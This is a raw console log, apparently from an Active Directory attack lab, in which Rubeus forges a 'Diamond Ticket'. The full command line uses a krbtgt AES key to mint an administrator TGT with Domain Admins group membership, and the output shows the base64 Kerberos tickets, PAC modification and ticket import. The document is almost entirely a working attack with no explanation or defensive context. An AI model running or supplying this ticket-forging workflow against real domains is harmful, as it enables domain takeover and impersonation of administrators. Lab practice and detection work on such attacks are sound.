PS C:\AD\Tools> .\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:student723 /password:xxxxxxxxxxxxxx /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Diamond Ticket
[*] Showing process : True
[*] Username : OCPBBF9Y
[*] Domain : 2M2G4XL4
[*] Password : 2WCYITLX
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 6388
[+] LUID : 0x483ae62
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALstudent723
[*] Using aes256_cts_hmac_sha1 hash: 8A55FB08BBBD0F30FEA2CEC44BF8548B4291230F6BFEE5107B45059484EAF75C
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\student723'
[*] Target LUID : 75738722
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
UC5MT0NBTA==
[*] Target LUID: 0x483ae62
[+] Ticket successfully imported!
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BNIwggTOoAMCARKhAwIBA6KCBMAEggS8AhejkVgrpMoCDNkEX4VYnzrEE0xuEFa5u2gBtxj+e9D1R7xu
yRdsoOR7wfznv7q5wzbIMNaxDp7h962XB8Ous9ffU+plwzadZwnQXHDPxp0SBF6kvCRcN777evjxXhCG
ePVsw/W0WkmJn2xWV0c9bE6Xm71JCCLwyigs4HJQ0cUR4nrYDYiJ4wfyQlrHdbSugzXMKUI08KSCd9IC
20zxYqsVMjnPh0oYgIsqXLRN0cVwfMmC52qdHqRukgu2MicflW8+/Kl6gsbTsq/OjtOX6H351YCa8Fl/
ooV2CCw1Na4SOMV53Eyr6aV8v0Fso+2rJAebbV+NjQsb7mI94bLMjLSJjhbbebaf04E1+LaeOOCrig2Q
piPY9tmsvqrrCw7grJ7+TdtauMA/+JtZ8QteHU/CTXke8eDiCOqSp9xFDceFcA9CkUeOSJ9QyblepW93
USlti/LzwOMPGQKAADWnUxiFYGv25cr3t+y0RALDa4jO7dTCmbceIjfLaqfw94VL34gR73+vWH8sHumw
eEgqb7ky6CwN54NE8KJ3Z3t6rpMOla2aU7NUsVtRkWx4v2zUFmam8rtvR6zPg+qW3MM1AZ+ah6v5dth3
DkSN2XDZSj8RS8t3nG+iFPf2DZymvGBmhLVDuE71Whm0SsXaxyPJsu42wuNqpUJOweiLySu5FIG1FYmH
hJ654dMp4HnByP2p9iOJmml9VebsqMZy+cvWmz6CLeZrHT4Q4Vfg7NMwh90/1dFcWcaYTJ5Dzd4WJuo7
abVZ6r5wFu5vsCMeYJHKuccUuIocQ7UX7M4BHihG9U8lp+nucGDAEBV3Y5rKgkIM34NC3I0+GCJkq+c5
+2/a+dKJXFy5FvucMHVRjB6T621akfT36kexH/QV/+IiYk6eoHtG4njbZLahbEpFoNJqvfOiTs1EvRbr
5pIUNw5uaLDvcdVdakG3alZSUDRlpKWBkSTcadrYwzimmvag6BUT4lTJE/s4nI6L8PDqPpHZO74X0cNN
DoAHUB8rd75PsNZwz5KGFt13PTTkl39dtn+lFFxMJj5/ERnUv/zhmteSUTEAZm3gdXiSZaqpTTDoRnJ/
bD1ahus9ddZdncx33hKmKU7WfxTjvm7qaMF973IHcvMj56yuvtY+wkjxIFnf+dA9Orvkg/W8Y/2/ayW8
cbxa/XZpxNgVFsxGBi0NrqR8PRUW5BFuEEjR9/HavRafj1PR5NoLhYyi+0hcf9rFivzjOi7jEJ1pUPll
R+gUREnXvEBCmTaAibRcmkgHqEffsNGK3xzSe7/DxiK5CdiYEYy9YjjeG/YaZIjoT8lZYsecMRF/8Caq
+qNKLuFW72lQIeDTVW4x0P6zH87z+9oro2maEai1PxDoB8XN7URr8vEh/K7NxMngF8BzYo4vox837YAk
eu/T6VTqOqctJ0XKs0n/Xsrk6AuawUJX8Y72LzU8HJo9sF0c2g83BBs3PPSC8LLa4dHBIZBOiueQOHH3
Xp8W9Ng5F17gFsWx9eUeViw8xKUM600YvbpK4OHM62TIHo6ojpSqFgGJvcSKMizbZmrC/7DHXcQZVUxc
pGpEAPdUJlM2oYbYMhQtSxBeI00u753D7qfigMosMFPa24XNo4IBGjCCARagAwIBAKKCAQ0EggEJfYIB
BTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgvIokGsQQvfbVuWul2dBijv/QM9EytijM8w/ONP4bC4ah
HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcD
BQBA4QAApREYDzIwMjQwMjI2MDA0MzA5WqYRGA8yMDI0MDIyNjEwNDMwOVqnERgPMjAyNDAzMDQwMDQz
MDlaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xM
QVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] Target LUID: 0x483ae62
[+] Ticket successfully imported!